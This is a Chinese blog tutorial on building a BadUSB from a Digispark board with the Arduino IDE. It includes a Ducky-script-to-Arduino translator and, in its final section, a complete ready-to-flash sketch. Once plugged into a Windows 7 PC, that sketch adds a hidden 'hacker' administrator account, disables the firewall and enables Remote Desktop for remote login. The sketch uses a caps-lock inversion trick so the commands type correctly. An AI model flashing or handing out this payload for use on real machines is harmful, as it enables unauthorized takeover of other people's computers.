BadUSB简介

图片

吾旧友,拾U盘,彼异之,插PC,遂上线。 这个愚蠢精彩故事不禁让我萌生学习制作一个BadUSB的想法,为了贴合实际,特地从某宝入手了一个BadUSB板,如下图所示。

图片

简单来说,通过硬件直接插入对方电脑,让对方电脑执行代码,达到控制主机或者窃取信息等目的(需要自行发挥想象)

准备工具

1
2
3
4
5
一个BadUSB_Rubber_Ducky(橡皮鸭)

Arduino的IDE - 下载地址:(https://www.arduino.cc/en/Main/Software)

DPinst64驱动(根据电脑型号来,普遍都是64位操作系统)

安装工具

Arduino的安装就不讲了,傻瓜式安装:安装包 - 下一步 - 完成!

DPinst64驱动安装的时候要选择始终信任来自Digistump LLC - 安装 - 下一步 - 完成!

图片

图片

Arduino环境配置

首先打开Arduino - 文件 - 首选项 - 附加开发板管理器网址:

http://digistump.com/package_digistump_index.json

图片

工具 - 开发板管理器 - 先等待它下载完文件:

图片

图片

接着在类型下拉菜单里有一个贡献然后选择Digistump_AVR安装完毕就Ok

图片

最后选择开发板对应的开发板型号编程器然后选择Keyboard一个模板:

图片

图片

代码编写

这是它示例的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include "DigiKeyboard.h"

void setup() {
// don't need to set anything up to use DigiKeyboard
}


void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);

// Type out this string letter by letter on the computer (assumes US-style
// keyboard)
DigiKeyboard.println("Hello Power_Liu");

// It's better to use DigiKeyboard.delay() over the regular Arduino delay()
// if doing keyboard stuff because it keeps talking to the computer to make
// sure the computer knows the keyboard is alive and connected
DigiKeyboard.delay(5000);
}

图片

上传烧录:

提示:Running Digispark Uploader…Plug in device now… (will timeout in 60 seconds)

这个时候需要60s的时间插入你的BadUSB:

图片

提示 : Micronucleus done. Thank you! 说明已经上传成功!这个时候插入BadUSB它会一直输入Hello Power_Liu直到拔掉为止:

图片

手把手教你写一个”Hello Hacker!”

1、先在记事本中写好我们的代码 - 另存为 hacker.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
//这个代码的意思就是打开cmd,然后输出Hello Hacker!
DELAY 5000
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
ENTER
DELAY 1000
STRING Hello Hacker!
DELAY 1500
ENTER
ENTER

图片

2、使用我们的Python转换脚本吧hacker.txt转换为ino文件:

Duckyspark_translator.py hacker.txt hacker

Python转换脚本源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
# -*- coding:utf-8 -*-

from __future__ import print_function
import sys

payload_input = ''
l='//'
mod_input=''
mod_output=''

def replacement():
print ('DigiKeyboard.', end ='')
print(
str(l.replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
.replace(' b', 'KEY_B')
.replace(' c', 'KEY_C')
.replace(' d', 'KEY_D')
.replace(' e', 'KEY_E')
.replace(' f', 'KEY_F')
.replace(' g', 'KEY_G')
.replace(' h', 'KEY_H')
.replace(' i', 'KEY_I')
.replace(' j', 'KEY_J')
.replace(' k', 'KEY_K')
.replace(' l', 'KEY_L')
.replace(' m', 'KEY_M')
.replace(' n', 'KEY_N')
.replace(' o', 'KEY_O')
.replace(' p', 'KEY_P')
.replace(' q', 'KEY_Q')
.replace(' r', 'KEY_R')
.replace(' s', 'KEY_S')
.replace(' t', 'KEY_T')
.replace(' u', 'KEY_U')
.replace(' v', 'KEY_V')
.replace(' w', 'KEY_W')
.replace(' x', 'KEY_X')
.replace(' y', 'KEY_Y')
.replace(' z', 'KEY_Z')

#1-0 if needed

#f1-f12
.replace(' F1','KEY_F1')
.replace(' F2','KEY_F2')
.replace(' F3','KEY_F3')
.replace(' F4','KEY_F4')
.replace(' F5','KEY_F5')
.replace(' F6','KEY_F6')
.replace(' F7','KEY_F7')
.replace(' F8','KEY_F8')
.replace(' F9','KEY_F9')
.replace(' F10','KEY_F10')
.replace(' F11','KEY_F11')
.replace(' F12','KEY_F12')
#arrows
.replace('LEFTARROW', 'KEY_ARROW_LEFT')
.replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
.replace('UPARROW','KEY_ARROW_UP')
.replace('DOWNARROW','KEY_ARROW_DOWN')
.replace('LEFT', 'KEY_ARROW_LEFT')
.replace('RIGH', 'KEY_ARROW_RIGHT')
.replace('UP','KEY_ARROW_UP')
.replace('DOWN','KEY_ARROW_DOWN')
#keys
.replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
.replace('TAB', 'sendKeyStroke(KEY_TAB')
.replace('SPACE', 'sendKeyStroke(KEY_SPACE')
.replace('CONTROL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
.replace('CTRL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
.replace('ESCAPE','sendKeyStroke(KEY_ESC' )
.replace('ENTER','sendKeyStroke(KEY_ENTER')),end = '')
print(');')

def modreplacement():
print ('DigiKeyboard.', end ='')
print('sendKeyStroke(', end = '')

print(
str(l.replace (mod_input, '').replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
.replace(' b', 'KEY_B')
.replace(' c', 'KEY_С')
.replace(' d', 'KEY_D')
.replace(' e', 'KEY_E')
.replace(' f', 'KEY_F')
.replace(' g', 'KEY_G')
.replace(' h', 'KEY_H')
.replace(' i', 'KEY_I')
.replace(' j', 'KEY_J')
.replace(' k', 'KEY_K')
.replace(' l', 'KEY_L')
.replace(' m', 'KEY_M')
.replace(' n', 'KEY_N')
.replace(' o', 'KEY_O')
.replace(' p', 'KEY_P')
.replace(' q', 'KEY_Q')
.replace(' r', 'KEY_R')
.replace(' s', 'KEY_S')
.replace(' t', 'KEY_T')
.replace(' u', 'KEY_U')
.replace(' v', 'KEY_V')
.replace(' w', 'KEY_W')
.replace(' x', 'KEY_X')
.replace(' y', 'KEY_Y')
.replace(' z', 'KEY_Z')

#1-0

#f1-f12
.replace(' F1','KEY_F1')
.replace(' F2','KEY_F2')
.replace(' F3','KEY_F3')
.replace(' F4','KEY_F4')
.replace(' F5','KEY_F5')
.replace(' F6','KEY_F6')
.replace(' F7','KEY_F7')
.replace(' F8','KEY_F8')
.replace(' F9','KEY_F9')
.replace(' F10','KEY_F10')
.replace(' F11','KEY_F11')
.replace(' F12','KEY_F12')

#arrows
.replace('LEFTARROW', 'KEY_ARROW_LEFT')
.replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
.replace('UPARROW','KEY_ARROW_UP')
.replace('DOWNARROW','KEY_ARROW_DOWN')
.replace('LEFT', 'KEY_ARROW_LEFT')
.replace('RIGH', 'KEY_ARROW_RIGHT')
.replace('UP','KEY_ARROW_UP')
.replace('DOWN','KEY_ARROW_DOWN')

.replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
.replace('TAB', 'sendKeyStroke(KEY_TAB')
.replace('ESCAPE','KEY_ESC' )
.replace('SPACE', 'KEY_SPACE')
.replace(' ','')
.replace('ENTER','KEY_ENTER')),end = '')

print(','+mod_output, end = '')
print(');')


#arguments
if len(sys.argv) == 2:
try:
payload_input = open(sys.argv[1], "r")
sys.stdout = open("digipayload.ino", "w")
z = len(open(sys.argv[1], "r").readlines())
except IOError:
print('\nError! File "'+sys.argv[1]+'" does not exist!\n' )
exit()
elif len(sys.argv) == 3:
try:
payload_input = open(sys.argv[1], "r")
sys.stdout = open(sys.argv[2]+'.ino', 'w')
z = len(open(sys.argv[1], "r").readlines())
except IOError:
print('\nError!, File "'+sys.argv[1]+'" does not exist!\n' )
exit()
elif len(sys.argv) > 3:
print('Too much Arguments')
exit()
else:
payload_input = open('payload.txt', "r")
sys.stdout = open("digipayload.ino", "w")
z = len(open('payload.txt', "r").readlines())

#--------------------------------------
#Digispark program fragment
print('//www.liuwx.cn&Qq211124332')
print('#include "DigiKeyboard.h"')
print('#define KEY_ESC 41')
print('#define KEY_BACKSPACE 42')
print('#define KEY_TAB 43')
print('#define KEY_PRT_SCR 70')
print('#define KEY_DELETE 76\n')

print('void setup() {\n')
print('DigiKeyboard.delay(5000);') #windows mozhet dolgo raspoznavat digispark potomu bylo resheno dobavlyat 5 sek delay vmesto 0.5sek
print('DigiKeyboard.sendKeyStroke(0);')
#---------------------------------------

for i in range(z):
l = payload_input.readline().replace('\n', '')

if len (l) < 1:
print('', end = '')

else:

if 'REM' in l:
print ('//', l)

else:
if 'DELAY' in l:
print ('DigiKeyboard.', end = '')
print (l.replace('DELAY', 'delay(').replace(' ',''), end = '')
print(');')

elif 'STRING' in l:
print ('DigiKeyboard.', end = '')
print (l.replace('"', '")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("')
.replace('\\', '")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("')
.replace('STRING ','print(F("'), end = '')
print ('")', end = '')
print(');');

elif (l == 'GUI') or (l == 'WINDOWS') or (l == 'CONTROL ESCAPE'):
print('DigiKeyboard.sendKeyStroke(KEY_ESC,MOD_CONTROL_LEFT);')

elif (l == 'GUI d') or (l == 'WINDOWS d'):
print ('DigiKeyboard.sendKeyStroke(KEY_D,MOD_GUI_LEFT);')

elif (l == 'WINDOWS r') or (l == 'GUI r'):
print ('DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);')

elif 'MENU' in l:
print ('DigiKeyboard.sendKeyStroke(MOD_GUI_RIGHT);')

#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!INVERCE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
elif 'CTRL ALT' in l:
replacement()
elif 'ALT' in l:
mod_input = 'ALT'
mod_output = 'MOD_ALT_RIGHT'
modreplacement()
elif 'CTRL' in l:
mod_input = 'CTRL'
mod_output = 'MOD_CONTROL_LEFT'
modreplacement()

elif 'CONTROL' in l:
mod_input = 'CONTROL'
mod_output = 'MOD_CONTROL_LEFT'
modreplacement()

#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
else:
replacement()

if len(l) <1:
print('', end = '')
#Digispark program fragment
print('\n}')
print('\n')
print('void loop() {\n')
print('}\n')
#-----------------------------------

payload_input.close()

转换完成后再当前目录下会有一个hacker.ino文件:

图片

打开后的代码是这样的:

图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
//www.liuwx.cn&Qq211124332
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("Hello Hacker!"));
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}

3、上传脚本 - 插入BadUSB进行烧录程序:

图片

上传成功后,它会自动执行我们的操作:会在屏幕上输出Hello Hacker!

插上U盘入侵局域网Win7登陆它的远程桌面

本来想写MSF + BadUSB 反弹Win7和Win10的Shell,但是百度上有了,我就没必要写在这篇文章了!

思路和主要步骤

1
2
3
4
5
6
7
8
9
1、在局域网中有一台PC-Win7系统

2、插上BadUSB关掉Win7的防火墙

3、创建一个HACKER的用户并提权为超级管理员

4、开启Win7的3389

5、局域网另一台电脑mstsc登陆Win7的桌面

命令注释

1
2
3
4
5
6
7
8
9
10
11
12
13
关闭防火墙的命令:netsh firewall set opmode mode=disable

打开Win7的3389命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

至于我为什么会吧上面这条开3389的命令有些字母是大写又有些字母是小写:

reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F

因为插入BadUSB会首先按下我们的大写锁定!然后才执行命令,因为怕有的电脑有中午输入法!所以我上面的语句要这样写!他会吧小写的在DOS窗口输出为大写,大写的命令会输出为小写!

按下回车键:DigiKeyboard.sendKeyStroke(KEY_ENTER);

延迟2秒执行(有的时候延迟时间短了会执行失败):DigiKeyboard.delay(2000);

附上代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
//www.liuwx.cn QQ211124332

#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
#define KEY_CAPS_LOCK 0x39

void setup() {

DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("color c"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("net user hacker Qliuwx123@ /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("net localgroup administrators hacker /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("netsh firewall set opmode mode=disable")); //关闭防火墙
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F")); //开3389
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);




}


void loop() {

}

具体演示的效果我放到了B站上:

插上U盘开启Win7的3389并关闭防火墙实施登陆它远程桌面

结尾

这篇文章更多的是让自己对Arduino以及硬件方面的知识有一个初步的认识及为了以后更深入的去学习,初识Arduino Rubber_Ducky,望各位大佬斧正。

打一波广告!最近申请了一个微信公众号:漏洞知识库,欢迎各位大佬们关注一波!

图片